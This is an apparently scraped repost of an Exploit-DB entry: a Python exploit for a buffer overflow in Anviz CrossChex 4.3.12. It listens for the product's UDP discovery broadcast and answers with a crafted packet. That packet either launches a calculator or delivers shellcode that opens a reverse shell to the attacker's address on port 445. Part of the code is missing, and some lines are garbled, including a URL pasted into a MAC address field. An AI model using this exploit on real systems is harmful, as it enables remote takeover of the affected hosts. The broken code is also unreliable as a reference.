Published on December 2nd, 2019 📆 | 5844 Views ⚑
Anviz CrossChex 4.3.12 – Local Buffer Overflow
# Exploit Title: Anviz CrossChex 4.3.12 - Local Buffer Overflow
# Date: 2019-11-30
# Exploit Author: Luis Catarino & Pedro Rodrigues
# Vendor Homepage: https://www.anviz.com/
# Software Link: https://www.anviz.com/download.html
# Version: Crosschex Standard x86 2:
request = request + shell_payload_1 + ipToShellcode(sys.argv[2]) + shell_payload_2
else:
request = request + calculator_payload
scapy.all.sendp( Ether(src="http://www.exploit-db.com/00:00:00:00:00:00", dst="ff:ff:ff:ff:ff:ff")/IP(src=ip,dst='255.255.255.255')/UDP(sport=sport,dport=dport)/Raw(load=request), iface=sys.argv[1] )
def setFuzzUDPServer(ip='', port=5050, timeout=150):
    """Run a UDP listener and call sendFuzzingUDPBroadcast once per datagram seen.

    An IPv4 UDP socket is bound on all interfaces (the bind address is
    always '', whatever `ip` is). Each round waits for one datagram,
    prints and records it, calls sendFuzzingUDPBroadcast(ip=ip), then
    waits for a second datagram whose content is discarded.

    Args:
        ip: Passed through unchanged to sendFuzzingUDPBroadcast; it is not
            used for binding.
        port: UDP port to listen on.
        timeout: Seconds. Used both as the per-recvfrom socket timeout and
            as the length of the overall listening window.

    Returns:
        The list of recvfrom() results (data, address) for the first
        datagram of each round.

    Review notes (behaviour kept as published):
        * The inbound datagram is presumably the CrossChex discovery
          broadcast (see the 'Waiting for crosschex' message) -- confirm
          against the product. For monitoring, the observable pattern is
          UDP traffic on `port` answered by a broadcast frame.
        * Both handlers are bare `except:`. If socket creation fails, the
          socket name is never bound, so the bind step fails too and the
          process exits with the "bind failed" message.
        * The socket is not closed if sendFuzzingUDPBroadcast raises.
    """
    try:
        listener = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    except:
        print('[!] Failed to create server socket')

    try:
        listener.bind(('', port))
    except:
        print('[*] Server socket bind failed')
        sys.exit()

    print('[*] Waiting for crosschex')
    listener.settimeout(timeout)

    # Overall cut-off; a single recvfrom() may already consume the whole
    # window because the socket timeout is the same number of seconds.
    deadline = time.time() + timeout
    captured = []

    while not time.time() > deadline:
        try:
            datagram = listener.recvfrom(1024)
            print(datagram)
            captured.append(datagram)
            sendFuzzingUDPBroadcast(ip=ip)
            # Second datagram is read only to wait for it; it is not kept.
            listener.recvfrom(1024)
        except socket.timeout:
            print("[!] Error with UDP server")

    listener.close()
    return captured
# Script entry point: require at least one command-line argument, then start
# the UDP listener with its default arguments.
nargs = len(sys.argv)
if nargs < 2:
    # NOTE(review): this usage text looks damaged by page extraction -- the
    # argument placeholders are missing, "%s" is never substituted on this
    # line, and "nt" is presumably what is left of "\n\t". Elsewhere in this
    # listing sys.argv[1] is passed to scapy as the interface and sys.argv[2]
    # is fed to ipToShellcode.
    print("[*] Usage: python3 %s []ntif you don't pass the ip of the LHOST it will drop a calculator, if you set the ip it will send a reverse shell to port 445")
    sys.exit(0)
# Called with the defaults from its signature (ip='', port=5050, timeout=150).
setFuzzUDPServer()
https://www.exploit-db.com/exploits/47734